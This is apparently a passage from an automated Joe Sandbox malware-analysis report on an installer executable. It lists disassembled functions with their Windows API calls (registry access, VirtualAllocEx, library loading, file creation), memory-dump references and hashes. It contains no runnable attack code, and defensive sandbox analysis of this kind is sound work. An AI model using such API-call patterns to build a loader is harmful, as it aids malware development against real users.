                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                            • Instruction ID: a78e2699c87532439836dc2b9ae7a1408ac691edae8af3cd19914ba1cc6957ae
                                                                            • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                            • Instruction Fuzzy Hash: 9C015A7254420AEFEB128F65EC45EEB3FACEF14354F004436F905A6220D235D964DBA5
                                                                            Function 100027E8 Relevance: 3.2, APIs: 2, Instructions: 156memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(00000000), ref: 100028A7
                                                                            • GetLastError.KERNEL32 ref: 100029AE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13435297109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000000.00000002.13435257498.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435328393.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13435360317.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_10000000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: AllocErrorLastVirtual
                                                                            • String ID:
                                                                            • API String ID: 497505419-0
                                                                            • Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                            • Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
                                                                            • Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
                                                                            • Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95
                                                                            Function 00402483 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000662,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B3
                                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj1A28.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040254F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3677997916-0
                                                                            • Opcode ID: 8e26defd033098e931a340efcbebfcd7db4374a64648cb469e792002de33b0c4
                                                                            • Instruction ID: 0483b46094dd03155b9d0e3ed9d5b90596ace3d3fa60599072770b53af9213ab
                                                                            • Opcode Fuzzy Hash: 8e26defd033098e931a340efcbebfcd7db4374a64648cb469e792002de33b0c4
                                                                            • Instruction Fuzzy Hash: 8811E371A05205EFDB20CF60CA985AEBBB4AF00359F20443FE142B72C0D2B84A81DB5A
                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                                            • Instruction ID: 00097469377630013da62b9f7c31fbdee85021c234e60ac5accdaffcc3ed26dc
                                                                            • Opcode Fuzzy Hash: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                                            • Instruction Fuzzy Hash: BE01F4316242209BF7194B389C04B6A3698E751354F10813BF811F62F1D678DC028B4D
                                                                            Function 00402377 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000662,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402396
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040239F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID:
                                                                            • API String ID: 849931509-0
                                                                            • Opcode ID: c3c705181fe5658603166456b70eb915c97a04fc9575d71e791babf096fcf5eb
                                                                            • Instruction ID: 60c1e4243d723511b4c64426b25872ec533dbc6a778a8c73d92c97a5d2103592
                                                                            • Opcode Fuzzy Hash: c3c705181fe5658603166456b70eb915c97a04fc9575d71e791babf096fcf5eb
                                                                            • Instruction Fuzzy Hash: 37F0A472A00111ABD710AFA09A8E9BE72A89B40344F24043BF201B71C0D5BD5D019769
                                                                            Function 00401A1E Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                                            • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStringslstrcmp
                                                                            • String ID:
                                                                            • API String ID: 1938659011-0
                                                                            • Opcode ID: e8d900abad3d3f7b08a48ee3306f5f417189d62f9577d7b4a96c9798fa742101
                                                                            • Instruction ID: 4f813d77772bd54bf890c65dc17d1f1cff84f8c3aa104cf5f65d7bfaad8725e5
                                                                            • Opcode Fuzzy Hash: e8d900abad3d3f7b08a48ee3306f5f417189d62f9577d7b4a96c9798fa742101
                                                                            • Instruction Fuzzy Hash: 3BF08231B05241EBCB20DF659D45A9A7FE8EFD1394B10843BE145F6190D2388541DA69
                                                                            Function 00406139 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                                              • Part of subcall function 004060CB: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060E2
                                                                              • Part of subcall function 004060CB: wsprintfA.USER32 ref: 0040611B
                                                                              • Part of subcall function 004060CB: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                            • Instruction ID: 8cdf97aa15b56aed8909a69d1313546704d2aaf6dd9f7bed8459987902a8e277
                                                                            • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                            • Instruction Fuzzy Hash: EFE08632608111AAD31067705E0493B73B89A84710302083EF506F6292D7389C2196A9
                                                                            Function 00405A13 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\nRNzqQOQwk.exe,80000000,?), ref: 00405A17
                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A39
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                            • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                            • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                            • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                            Function 004054FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,00403173,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405502
                                                                            • GetLastError.KERNEL32 ref: 00405510
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                            • Instruction ID: 104873d821a1170e2273ca40e0eecd38832efcbc0b1179f41fab49dbd7078dd9
                                                                            • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                            • Instruction Fuzzy Hash: 23C04C70629501FBDA106B209E097177D55AB90745F1049766106E20F4DA749451D92E
                                                                            Function 004025D7 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: wsprintf
                                                                            • String ID:
                                                                            • API String ID: 2111968516-0
                                                                            • Opcode ID: 4ba2856da63ff7f435db743ac2a14cc2248dd3629aba4a8dceb7604ea70bc87f
                                                                            • Instruction ID: cbf00d81cb97437f3a5b335f5c35441536f11fd869f9e222d526ef6a243a720c
                                                                            • Opcode Fuzzy Hash: 4ba2856da63ff7f435db743ac2a14cc2248dd3629aba4a8dceb7604ea70bc87f
                                                                            • Instruction Fuzzy Hash: 9521C970D0429ABEDF218B9885486AEBF749F01314F1445BFEC95B63D1C2BE8A81CF19
                                                                            Function 00402695 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026B3
                                                                              • Part of subcall function 00405CFE: wsprintfA.USER32 ref: 00405D0B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417599154.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13418225620.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_nRNzqQOQwk.jbxd
                                                                            Similarity
                                                                            • API ID: FilePointerwsprintf
                                                                            • String ID:
                                                                            • API String ID: 327478801-0
                                                                            • Opcode ID: abf4405e99e4dcb85fe8fe58243fd46f792263ec105484f86c7cee990d7a89bb
                                                                            • Instruction ID: fecccce0915ab20f046520e702d9d3c2ebd546ffbad39029680d96f2603726cc
                                                                            • Opcode Fuzzy Hash: abf4405e99e4dcb85fe8fe58243fd46f792263ec105484f86c7cee990d7a89bb
                                                                            • Instruction Fuzzy Hash: B8E01BB1B05115AFD701EB956A4987F7769DF40328F10443BF141F50D1C67E4D429B6D
                                                                            Function 004022F2 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.13417534408.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.13417502270.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.13417566610.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
